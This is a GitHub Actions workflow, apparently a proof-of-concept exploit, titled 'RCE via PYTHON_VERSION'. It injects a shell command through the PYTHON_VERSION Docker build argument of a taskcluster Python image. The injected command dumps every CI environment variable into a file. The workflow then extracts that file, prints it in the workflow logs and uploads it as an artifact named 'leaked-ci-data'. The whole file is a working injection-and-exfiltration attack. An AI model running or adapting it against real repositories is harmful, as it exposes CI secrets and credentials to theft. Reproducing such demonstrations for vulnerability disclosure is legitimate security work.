name: RCE via PYTHON_VERSION

on: [push]

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Inject and Extract Environment Variables
        run: |
          # 1. Build the Docker image with the injection
          #    This payload writes printenv output to /leaks.txt INSIDE the Docker image.
          docker build \
            --build-arg PYTHON_VERSION="echo '--- CI Environment Variables ---' > /leaks.txt; printenv >> /leaks.txt" \
            -t leak-image \
            ./taskcluster/docker/python

          # 2. Extract /leaks.txt from the built image onto the GitHub Actions runner's filesystem
          mkdir -p artifacts
          docker run --rm leak-image cat /leaks.txt > artifacts/leaked_data.txt || echo "Failed to extract /leaks.txt from image."

      - name: Display Leaked Data (in workflow logs)
        run: |
          echo "--- Contents of leaked_data.txt extracted to runner ---"
          cat artifacts/leaked_data.txt || echo "No data extracted to runner."

      - name: Upload Leaked Data as Artifact
        uses: actions/upload-artifact@v3
        with:
          name: leaked-ci-data
          path: artifacts/leaked_data.txt
